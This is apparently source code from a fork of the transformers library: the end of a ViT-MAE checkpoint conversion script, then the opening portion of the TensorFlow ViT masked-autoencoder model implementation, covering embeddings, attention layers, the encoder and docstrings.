name = name.replace("norm.bias", "vit.layernorm.bias")
return name
def convert_state_dict(orig_state_dict, config):
for key in orig_state_dict.copy().keys():
val = orig_state_dict.pop(key)
if "qkv" in key:
key_split = key.split(".")
layer_num = int(key_split[1])
if "decoder_blocks" in key:
dim = config.decoder_hidden_size
prefix = "decoder.decoder_layers."
if "weight" in key:
orig_state_dict[f"{prefix}{layer_num}.attention.attention.query.weight"] = val[:dim, :]
orig_state_dict[f"{prefix}{layer_num}.attention.attention.key.weight"] = val[dim : dim * 2, :]
orig_state_dict[f"{prefix}{layer_num}.attention.attention.value.weight"] = val[-dim:, :]
elif "bias" in key:
orig_state_dict[f"{prefix}{layer_num}.attention.attention.query.bias"] = val[:dim]
orig_state_dict[f"{prefix}{layer_num}.attention.attention.key.bias"] = val[dim : dim * 2]
orig_state_dict[f"{prefix}{layer_num}.attention.attention.value.bias"] = val[-dim:]
else:
dim = config.hidden_size
prefix = "vit.encoder.layer."
if "weight" in key:
orig_state_dict[f"{prefix}{layer_num}.attention.attention.query.weight"] = val[:dim, :]
orig_state_dict[f"{prefix}{layer_num}.attention.attention.key.weight"] = val[dim : dim * 2, :]
orig_state_dict[f"{prefix}{layer_num}.attention.attention.value.weight"] = val[-dim:, :]
elif "bias" in key:
orig_state_dict[f"{prefix}{layer_num}.attention.attention.query.bias"] = val[:dim]
orig_state_dict[f"{prefix}{layer_num}.attention.attention.key.bias"] = val[dim : dim * 2]
orig_state_dict[f"{prefix}{layer_num}.attention.attention.value.bias"] = val[-dim:]
else:
orig_state_dict[rename_key(key)] = val
return orig_state_dict
def convert_vit_mae_checkpoint(checkpoint_url, pytorch_dump_folder_path):
config = ViTMAEConfig()
if "large" in checkpoint_url:
config.hidden_size = 1024
config.intermediate_size = 4096
config.num_hidden_layers = 24
config.num_attention_heads = 16
elif "huge" in checkpoint_url:
config.patch_size = 14
config.hidden_size = 1280
config.intermediate_size = 5120
config.num_hidden_layers = 32
config.num_attention_heads = 16
model = ViTMAEForPreTraining(config)
state_dict = torch.hub.load_state_dict_from_url(checkpoint_url, map_location="cpu")["model"]
feature_extractor = ViTMAEFeatureExtractor(size=config.image_size)
new_state_dict = convert_state_dict(state_dict, config)
model.load_state_dict(new_state_dict)
model.eval()
url = "https://user-images.githubusercontent.com/11435359/147738734-196fd92f-9260-48d5-ba7e-bf103d29364d.jpg"
image = Image.open(requests.get(url, stream=True).raw)
feature_extractor = ViTMAEFeatureExtractor(size=config.image_size)
inputs = feature_extractor(images=image, return_tensors="pt")
# forward pass
torch.manual_seed(2)
outputs = model(**inputs)
logits = outputs.logits
if "large" in checkpoint_url:
expected_slice = torch.tensor(
[[-0.7309, -0.7128, -1.0169], [-1.0161, -0.9058, -1.1878], [-1.0478, -0.9411, -1.1911]]
)
elif "huge" in checkpoint_url:
expected_slice = torch.tensor(
[[-1.1599, -0.9199, -1.2221], [-1.1952, -0.9269, -1.2307], [-1.2143, -0.9337, -1.2262]]
)
else:
expected_slice = torch.tensor(
[[-0.9192, -0.8481, -1.1259], [-1.1349, -1.0034, -1.2599], [-1.1757, -1.0429, -1.2726]]
)
# verify logits
assert torch.allclose(logits[0, :3, :3], expected_slice, atol=1e-4)
print(f"Saving model to {pytorch_dump_folder_path}")
model.save_pretrained(pytorch_dump_folder_path)
print(f"Saving feature extractor to {pytorch_dump_folder_path}")
feature_extractor.save_pretrained(pytorch_dump_folder_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--checkpoint_url",
default="https://dl.fbaipublicfiles.com/mae/visualize/mae_visualize_vit_base.pth",
type=str,
help="URL of the checkpoint you'd like to convert.",
)
parser.add_argument(
"--pytorch_dump_folder_path", default=None, type=str, help="Path to the output PyTorch model directory."
)
args = parser.parse_args()
convert_vit_mae_checkpoint(args.checkpoint_url, args.pytorch_dump_folder_path)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 49,403 | src/transformers/models/vit_mae/modeling_tf_vit_mae.py | # coding=utf-8
# Copyright 2022 Facebook AI and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" TF 2.0 ViT MAE (masked autoencoder) model."""
import collections.abc
import math
from copy import deepcopy
from dataclasses import dataclass
from typing import Dict, Optional, Tuple, Union
import numpy as np
import tensorflow as tf
from ...activations_tf import get_tf_activation
from ...file_utils import (
ModelOutput,
add_start_docstrings,
add_start_docstrings_to_model_forward,
replace_return_docstrings,
)
from ...modeling_tf_outputs import TFBaseModelOutput
from ...modeling_tf_utils import (
TFModelInputType,
TFPreTrainedModel,
get_initializer,
keras_serializable,
unpack_inputs,
)
from ...tf_utils import shape_list, stable_softmax
from ...utils import logging
from .configuration_vit_mae import ViTMAEConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "ViTMAEConfig"
_CHECKPOINT_FOR_DOC = "facebook/vit-mae-base"
@dataclass
class TFViTMAEModelOutput(ModelOutput):
"""
Class for TFViTMAEModel's outputs, with potential hidden states and attentions.
Args:
last_hidden_state (`tf.Tensor` of shape `(batch_size, sequence_length, hidden_size)`):
Sequence of hidden-states at the output of the last layer of the model.
mask (`tf.Tensor` of shape `(batch_size, sequence_length)`):
Tensor indicating which patches are masked (1) and which are not (0).
ids_restore (`tf.Tensor` of shape `(batch_size, sequence_length)`):
Tensor containing the original index of the (shuffled) masked patches.
hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape
`(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus
the initial embedding outputs.
attentions (`tuple(tf.Tensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `tf.Tensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
the self-attention heads.
"""
last_hidden_state: tf.Tensor = None
mask: tf.Tensor = None
ids_restore: tf.Tensor = None
hidden_states: Optional[Tuple[tf.Tensor]] = None
attentions: Optional[Tuple[tf.Tensor]] = None
@dataclass
class TFViTMAEDecoderOutput(ModelOutput):
"""
Class for TFViTMAEDecoder's outputs, with potential hidden states and attentions.
Args:
logits (`tf.Tensor` of shape `(batch_size, sequence_length, patch_size ** 2 * num_channels)`):
Pixel reconstruction logits.
hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape
`(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus
the initial embedding outputs.
attentions (`tuple(tf.Tensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `tf.Tensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
the self-attention heads.
"""
logits: tf.Tensor = None
hidden_states: Optional[Tuple[tf.Tensor]] = None
attentions: Optional[Tuple[tf.Tensor]] = None
@dataclass
class TFViTMAEForPreTrainingOutput(ModelOutput):
"""
Class for TFViTMAEForPreTraining's outputs, with potential hidden states and attentions.
Args:
loss (`tf.Tensor` of shape `(1,)`):
Pixel reconstruction loss.
logits (`tf.Tensor` of shape `(batch_size, sequence_length, patch_size ** 2 * num_channels)`):
Pixel reconstruction logits.
mask (`tf.Tensor` of shape `(batch_size, sequence_length)`):
Tensor indicating which patches are masked (1) and which are not (0).
ids_restore (`tf.Tensor` of shape `(batch_size, sequence_length)`):
Tensor containing the original index of the (shuffled) masked patches.
hidden_states (`tuple(tf.Tensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of shape
`(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus
the initial embedding outputs.
attentions (`tuple(tf.Tensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `tf.Tensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in
the self-attention heads.
"""
loss: Optional[tf.Tensor] = None
logits: tf.Tensor = None
mask: tf.Tensor = None
ids_restore: tf.Tensor = None
hidden_states: Optional[Tuple[tf.Tensor]] = None
attentions: Optional[Tuple[tf.Tensor]] = None
def get_2d_sincos_pos_embed(embed_dim, grid_size, add_cls_token=False):
"""
Create 2D sin/cos positional embeddings.
Args:
embed_dim (`int`):
Embedding dimension.
grid_size (`int`):
The grid height and width.
add_cls_token (`bool`, *optional*, defaults to `False`):
Whether or not to add a classification (CLS) token.
Returns:
(`tf.Tensor` of shape (grid_size*grid_size, embed_dim) or (1+grid_size*grid_size, embed_dim): the position
embeddings (with or without classification token)
"""
grid_h = tf.range(grid_size, dtype=tf.float32)
grid_w = tf.range(grid_size, dtype=tf.float32)
grid = tf.meshgrid(grid_w, grid_h) # here w goes first
grid = tf.stack(grid, axis=0)
grid = tf.reshape(grid, [2, 1, grid_size, grid_size])
pos_embed = get_2d_sincos_pos_embed_from_grid(embed_dim, grid)
if add_cls_token:
pos_embed = tf.concat([tf.zeros((1, embed_dim)), pos_embed], axis=0)
return pos_embed
def get_2d_sincos_pos_embed_from_grid(embed_dim, grid):
if embed_dim % 2 != 0:
raise ValueError("embed_dim must be even")
# use half of dimensions to encode grid_h
emb_h = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[0]) # (H*W, D/2)
emb_w = get_1d_sincos_pos_embed_from_grid(embed_dim // 2, grid[1]) # (H*W, D/2)
emb = tf.concat([emb_h, emb_w], axis=1) # (H*W, D)
return emb
def get_1d_sincos_pos_embed_from_grid(embed_dim, pos):
"""
embed_dim: output dimension for each position pos: a list of positions to be encoded: size (M,) out: (M, D)
"""
if embed_dim % 2 != 0:
raise ValueError("embed_dim must be even")
omega = tf.range(embed_dim // 2, dtype="float32")
omega /= embed_dim / 2.0
omega = 1.0 / 10000**omega # (D/2,)
pos = tf.reshape(pos, [-1]) # (M,)
out = tf.einsum("m,d->md", pos, omega) # (M, D/2), outer product
# half of the positions get sinusoidal pattern and the rest gets
# cosine pattern and then they are concatenated
emb_sin = tf.sin(out) # (M, D/2)
emb_cos = tf.cos(out) # (M, D/2)
emb = tf.concat([emb_sin, emb_cos], axis=1) # (M, D)
return emb
class TFViTMAEEmbeddings(tf.keras.layers.Layer):
"""
Construct the CLS token, position and patch embeddings.
"""
def __init__(self, config: ViTMAEConfig, **kwargs):
super().__init__(**kwargs)
self.patch_embeddings = TFViTMAEPatchEmbeddings(config, name="patch_embeddings")
self.num_patches = self.patch_embeddings.num_patches
self.config = config
def build(self, input_shape: tf.TensorShape):
self.cls_token = self.add_weight(
shape=(1, 1, self.config.hidden_size),
initializer=tf.random_normal_initializer(stddev=self.config.initializer_range),
trainable=True,
name="cls_token",
)
self.position_embeddings = self.add_weight(
shape=(1, self.num_patches + 1, self.config.hidden_size),
initializer="zeros",
trainable=False, # fixed sin-cos embedding
name="position_embeddings",
)
pos_embed = get_2d_sincos_pos_embed(
self.position_embeddings.shape[-1],
int(self.patch_embeddings.num_patches**0.5),
add_cls_token=True,
)[None, ...]
self.position_embeddings.assign(pos_embed)
super().build(input_shape)
def random_masking(self, sequence: tf.Tensor, noise: Optional[tf.Tensor] = None):
"""
Perform per-sample random masking by per-sample shuffling. Per-sample shuffling is done by argsort random
noise.
Args:
sequence (`tf.Tensor` of shape `(batch_size, sequence_length, dim)`)
noise (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*) which is
mainly used for testing purposes to control randomness and maintain the reproducibility
"""
batch_size, seq_length, dim = shape_list(sequence)
len_keep = int(seq_length * (1 - self.config.mask_ratio))
if noise is None:
noise = tf.random.uniform(shape=(batch_size, seq_length), minval=0.0, maxval=1.0) # noise in [0, 1)
# sort noise for each sample
ids_shuffle = tf.argsort(noise, axis=1) # ascend: small is keep, large is remove
ids_restore = tf.argsort(ids_shuffle, axis=1)
# keep the first subset
ids_keep = ids_shuffle[:, :len_keep]
sequence_unmasked = tf.gather(
sequence,
axis=1,
batch_dims=1,
indices=ids_keep,
)
# generate the binary mask: 0 is keep, 1 is remove
# this hack is needed because TF's EagerTensors don't support
# assignment
mask_keep = tf.zeros((batch_size, len_keep))
mask_remove = tf.ones((batch_size, seq_length - len_keep))
mask = tf.concat([mask_keep, mask_remove], axis=-1)
# unshuffle to get the binary mask
mask = tf.gather(mask, axis=1, batch_dims=1, indices=ids_restore)
return sequence_unmasked, mask, ids_restore
def call(self, pixel_values: tf.Tensor, noise: tf.Tensor = None) -> tf.Tensor:
embeddings = self.patch_embeddings(pixel_values)
# add position embeddings w/o cls token
embeddings = embeddings + self.position_embeddings[:, 1:, :]
# masking: length -> length * config.mask_ratio
embeddings, mask, ids_restore = self.random_masking(embeddings, noise)
# append cls token
cls_token = self.cls_token + self.position_embeddings[:, :1, :]
cls_tokens = tf.tile(cls_token, (shape_list(embeddings)[0], 1, 1))
embeddings = tf.concat([cls_tokens, embeddings], axis=1)
return embeddings, mask, ids_restore
class TFViTMAEPatchEmbeddings(tf.keras.layers.Layer):
"""
This class turns `pixel_values` of shape `(batch_size, num_channels, height, width)` into the initial
`hidden_states` (patch embeddings) of shape `(batch_size, seq_length, hidden_size)` to be consumed by a
Transformer.
"""
def __init__(self, config: ViTMAEConfig, **kwargs):
super().__init__(**kwargs)
image_size, patch_size = config.image_size, config.patch_size
num_channels, hidden_size = config.num_channels, config.hidden_size
image_size = image_size if isinstance(image_size, collections.abc.Iterable) else (image_size, image_size)
patch_size = patch_size if isinstance(patch_size, collections.abc.Iterable) else (patch_size, patch_size)
num_patches = (image_size[1] // patch_size[1]) * (image_size[0] // patch_size[0])
self.image_size = image_size
self.patch_size = patch_size
self.num_patches = num_patches
self.num_channels = num_channels
self.config = config
self.projection = tf.keras.layers.Conv2D(
filters=hidden_size,
kernel_size=patch_size,
strides=patch_size,
padding="valid",
data_format="channels_last",
kernel_initializer="glorot_uniform", # following torch.nn.Linear
bias_initializer="zeros",
name="projection",
)
def call(self, pixel_values: tf.Tensor, training: bool = False) -> tf.Tensor:
batch_size, num_channels, height, width = shape_list(pixel_values)
if tf.executing_eagerly():
if num_channels != self.num_channels:
raise ValueError(
"Make sure that the channel dimension of the pixel values match with the one set in the"
" configuration."
)
if height != self.image_size[0] or width != self.image_size[1]:
raise ValueError(
f"Input image size ({height}*{width}) doesn't match model"
f" ({self.image_size[0]}*{self.image_size[1]})."
)
# When running on CPU, `tf.keras.layers.Conv2D` doesn't support `NCHW` format.
# So change the input format from `NCHW` to `NHWC`.
# shape = (batch_size, in_height, in_width, in_channels=num_channels)
pixel_values = tf.transpose(pixel_values, perm=(0, 2, 3, 1))
projection = self.projection(pixel_values)
# Change the 2D spatial dimensions to a single temporal dimension.
# shape = (batch_size, num_patches, out_channels=embed_dim)
num_patches = (width // self.patch_size[1]) * (height // self.patch_size[0])
x = tf.reshape(tensor=projection, shape=(batch_size, num_patches, -1))
return x
# Copied from transformers.models.vit.modeling_tf_vit.TFViTSelfAttention with ViT->ViTMAE
class TFViTMAESelfAttention(tf.keras.layers.Layer):
def __init__(self, config: ViTMAEConfig, **kwargs):
super().__init__(**kwargs)
if config.hidden_size % config.num_attention_heads != 0:
raise ValueError(
f"The hidden size ({config.hidden_size}) is not a multiple of the number "
f"of attention heads ({config.num_attention_heads})"
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.sqrt_att_head_size = math.sqrt(self.attention_head_size)
self.query = tf.keras.layers.Dense(
units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="query"
)
self.key = tf.keras.layers.Dense(
units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="key"
)
self.value = tf.keras.layers.Dense(
units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="value"
)
self.dropout = tf.keras.layers.Dropout(rate=config.attention_probs_dropout_prob)
def transpose_for_scores(self, tensor: tf.Tensor, batch_size: int) -> tf.Tensor:
# Reshape from [batch_size, seq_length, all_head_size] to [batch_size, seq_length, num_attention_heads, attention_head_size]
tensor = tf.reshape(tensor=tensor, shape=(batch_size, -1, self.num_attention_heads, self.attention_head_size))
# Transpose the tensor from [batch_size, seq_length, num_attention_heads, attention_head_size] to [batch_size, num_attention_heads, seq_length, attention_head_size]
return tf.transpose(tensor, perm=[0, 2, 1, 3])
def call(
self,
hidden_states: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
training: bool = False,
) -> Tuple[tf.Tensor]:
batch_size = shape_list(hidden_states)[0]
mixed_query_layer = self.query(inputs=hidden_states)
mixed_key_layer = self.key(inputs=hidden_states)
mixed_value_layer = self.value(inputs=hidden_states)
query_layer = self.transpose_for_scores(mixed_query_layer, batch_size)
key_layer = self.transpose_for_scores(mixed_key_layer, batch_size)
value_layer = self.transpose_for_scores(mixed_value_layer, batch_size)
# Take the dot product between "query" and "key" to get the raw attention scores.
# (batch size, num_heads, seq_len_q, seq_len_k)
attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True)
dk = tf.cast(self.sqrt_att_head_size, dtype=attention_scores.dtype)
attention_scores = tf.divide(attention_scores, dk)
# Normalize the attention scores to probabilities.
attention_probs = stable_softmax(logits=attention_scores, axis=-1)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(inputs=attention_probs, training=training)
# Mask heads if we want to
if head_mask is not None:
attention_probs = tf.multiply(attention_probs, head_mask)
attention_output = tf.matmul(attention_probs, value_layer)
attention_output = tf.transpose(attention_output, perm=[0, 2, 1, 3])
# (batch_size, seq_len_q, all_head_size)
attention_output = tf.reshape(tensor=attention_output, shape=(batch_size, -1, self.all_head_size))
outputs = (attention_output, attention_probs) if output_attentions else (attention_output,)
return outputs
# Copied from transformers.models.vit.modeling_tf_vit.TFViTSelfOutput with ViT->ViTMAE
class TFViTMAESelfOutput(tf.keras.layers.Layer):
"""
The residual connection is defined in TFViTMAELayer instead of here (as is the case with other models), due to the
layernorm applied before each block.
"""
def __init__(self, config: ViTMAEConfig, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
)
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
def call(self, hidden_states: tf.Tensor, input_tensor: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_states = self.dense(inputs=hidden_states)
hidden_states = self.dropout(inputs=hidden_states, training=training)
return hidden_states
# Copied from transformers.models.vit.modeling_tf_vit.TFViTAttention with ViT->ViTMAE
class TFViTMAEAttention(tf.keras.layers.Layer):
def __init__(self, config: ViTMAEConfig, **kwargs):
super().__init__(**kwargs)
self.self_attention = TFViTMAESelfAttention(config, name="attention")
self.dense_output = TFViTMAESelfOutput(config, name="output")
def prune_heads(self, heads):
raise NotImplementedError
def call(
self,
input_tensor: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
training: bool = False,
) -> Tuple[tf.Tensor]:
self_outputs = self.self_attention(
hidden_states=input_tensor, head_mask=head_mask, output_attentions=output_attentions, training=training
)
attention_output = self.dense_output(
hidden_states=self_outputs[0], input_tensor=input_tensor, training=training
)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
# Copied from transformers.models.vit.modeling_tf_vit.TFViTIntermediate with ViT->ViTMAE
class TFViTMAEIntermediate(tf.keras.layers.Layer):
def __init__(self, config: ViTMAEConfig, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=config.intermediate_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = get_tf_activation(config.hidden_act)
else:
self.intermediate_act_fn = config.hidden_act
def call(self, hidden_states: tf.Tensor) -> tf.Tensor:
hidden_states = self.dense(inputs=hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
# Copied from transformers.models.vit.modeling_tf_vit.TFViTOutput with ViT->ViTMAE
class TFViTMAEOutput(tf.keras.layers.Layer):
def __init__(self, config: ViTMAEConfig, **kwargs):
super().__init__(**kwargs)
self.dense = tf.keras.layers.Dense(
units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
)
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
def call(self, hidden_states: tf.Tensor, input_tensor: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_states = self.dense(inputs=hidden_states)
hidden_states = self.dropout(inputs=hidden_states, training=training)
hidden_states = hidden_states + input_tensor
return hidden_states
# Copied from transformers.models.vit.modeling_tf_vit.TFViTLayer with ViT->ViTMAE
class TFViTMAELayer(tf.keras.layers.Layer):
"""This corresponds to the Block class in the timm implementation."""
def __init__(self, config: ViTMAEConfig, **kwargs):
super().__init__(**kwargs)
self.attention = TFViTMAEAttention(config, name="attention")
self.intermediate = TFViTMAEIntermediate(config, name="intermediate")
self.vit_output = TFViTMAEOutput(config, name="output")
self.layernorm_before = tf.keras.layers.LayerNormalization(
epsilon=config.layer_norm_eps, name="layernorm_before"
)
self.layernorm_after = tf.keras.layers.LayerNormalization(
epsilon=config.layer_norm_eps, name="layernorm_after"
)
def call(
self,
hidden_states: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
training: bool = False,
) -> Tuple[tf.Tensor]:
attention_outputs = self.attention(
# in ViTMAE, layernorm is applied before self-attention
input_tensor=self.layernorm_before(inputs=hidden_states),
head_mask=head_mask,
output_attentions=output_attentions,
training=training,
)
attention_output = attention_outputs[0]
# first residual connection
hidden_states = attention_output + hidden_states
# in ViTMAE, layernorm is also applied after self-attention
layer_output = self.layernorm_after(inputs=hidden_states)
intermediate_output = self.intermediate(hidden_states=layer_output)
# second residual connection is done here
layer_output = self.vit_output(
hidden_states=intermediate_output, input_tensor=hidden_states, training=training
)
outputs = (layer_output,) + attention_outputs[1:] # add attentions if we output them
return outputs
# Copied from transformers.models.vit.modeling_tf_vit.TFViTEncoder with ViT->ViTMAE
class TFViTMAEEncoder(tf.keras.layers.Layer):
def __init__(self, config: ViTMAEConfig, **kwargs):
super().__init__(**kwargs)
self.layer = [TFViTMAELayer(config, name=f"layer_._{i}") for i in range(config.num_hidden_layers)]
def call(
self,
hidden_states: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
output_hidden_states: bool,
return_dict: bool,
training: bool = False,
) -> Union[TFBaseModelOutput, Tuple[tf.Tensor]]:
all_hidden_states = () if output_hidden_states else None
all_attentions = () if output_attentions else None
for i, layer_module in enumerate(self.layer):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_outputs = layer_module(
hidden_states=hidden_states,
head_mask=head_mask[i],
output_attentions=output_attentions,
training=training,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_attentions = all_attentions + (layer_outputs[1],)
# Add last layer
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, all_hidden_states, all_attentions] if v is not None)
return TFBaseModelOutput(
last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_attentions
)
@keras_serializable
class TFViTMAEMainLayer(tf.keras.layers.Layer):
config_class = ViTMAEConfig
def __init__(self, config: ViTMAEConfig, **kwargs):
super().__init__(**kwargs)
self.config = config
self.embeddings = TFViTMAEEmbeddings(config, name="embeddings")
self.encoder = TFViTMAEEncoder(config, name="encoder")
self.layernorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="layernorm")
def get_input_embeddings(self) -> tf.keras.layers.Layer:
return self.embeddings.patch_embeddings
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
raise NotImplementedError
@unpack_inputs
def call(
self,
pixel_values: Optional[TFModelInputType] = None,
noise: tf.Tensor = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: bool = False,
) -> Union[TFViTMAEModelOutput, Tuple[tf.Tensor]]:
embedding_output, mask, ids_restore = self.embeddings(
pixel_values=pixel_values, training=training, noise=noise
)
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
if head_mask is not None:
raise NotImplementedError
else:
head_mask = [None] * self.config.num_hidden_layers
encoder_outputs = self.encoder(
embedding_output,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
)
sequence_output = encoder_outputs[0]
sequence_output = self.layernorm(inputs=sequence_output)
if not return_dict:
return (sequence_output, mask, ids_restore) + encoder_outputs[1:]
return TFViTMAEModelOutput(
last_hidden_state=sequence_output,
mask=mask,
ids_restore=ids_restore,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
class TFViTMAEPreTrainedModel(TFPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = ViTMAEConfig
base_model_prefix = "vit"
main_input_name = "pixel_values"
@property
def dummy_inputs(self) -> Dict[str, tf.Tensor]:
"""
Dummy inputs to build the network. Returns:
`Dict[str, tf.Tensor]`: The dummy inputs.
"""
VISION_DUMMY_INPUTS = tf.random.uniform(
shape=(3, self.config.num_channels, self.config.image_size, self.config.image_size),
dtype=tf.float32,
)
return {"pixel_values": tf.constant(VISION_DUMMY_INPUTS)}
@tf.function(
input_signature=[
{
"pixel_values": tf.TensorSpec((None, None, None, None), tf.float32, name="pixel_values"),
}
]
)
def serving(self, inputs):
"""
Method used for serving the model.
Args:
inputs (`Dict[str, tf.Tensor]`):
The input of the saved model as a dictionary of tensors.
"""
output = self.call(inputs)
return self.serving_output(output)
VIT_MAE_START_DOCSTRING = r"""
This model inherits from [`TFPreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a [tf.keras.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) subclass. Use it
as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage and
behavior.
<Tip>
TensorFlow models and layers in `transformers` accept two formats as input:
- having all inputs as keyword arguments (like PyTorch models), or
- having all inputs as a list, tuple or dict in the first positional argument.
The reason the second format is supported is that Keras methods prefer this format when passing inputs to models
and layers. Because of this support, when using methods like `model.fit()` things should "just work" for you - just
pass your inputs and labels in any format that `model.fit()` supports! If, however, you want to use the second
format outside of Keras methods like `fit()` and `predict()`, such as when creating your own layers or models with
the Keras `Functional` API, there are three possibilities you can use to gather all the input Tensors in the first
positional argument:
- a single Tensor with `pixel_values` only and nothing else: `model(pixel_values)`
- a list of varying length with one or several input Tensors IN THE ORDER given in the docstring:
`model([pixel_values, attention_mask])` or `model([pixel_values, attention_mask, token_type_ids])`
- a dictionary with one or several input Tensors associated to the input names given in the docstring:
`model({"pixel_values": pixel_values, "token_type_ids": token_type_ids})`
Note that when creating models and layers with
[subclassing](https://keras.io/guides/making_new_layers_and_models_via_subclassing/) then you don't need to worry
about any of this, as you can just pass inputs like you would to any other Python function!
</Tip>
Args:
config ([`ViTMAEConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
VIT_MAE_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`np.ndarray`, `tf.Tensor`, `List[tf.Tensor]` ``Dict[str, tf.Tensor]` or `Dict[str, np.ndarray]` and each example must have the shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See [`ViTImageProcessor.__call__`]
for details.
head_mask (`np.ndarray` or `tf.Tensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail. This argument can be used only in eager mode, in graph mode the value in the
config will be used instead.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail. This argument can be used only in eager mode, in graph mode the value in the config will be
used instead.
return_dict (`bool`, *optional*):
Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple. This argument can be used
in eager mode, in graph mode the value will always be set to True.
training (`bool`, *optional*, defaults to `False``):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
@add_start_docstrings(
"The bare ViTMAE Model transformer outputting raw hidden-states without any specific head on top.",
VIT_MAE_START_DOCSTRING,
)
class TFViTMAEModel(TFViTMAEPreTrainedModel):
def __init__(self, config: ViTMAEConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
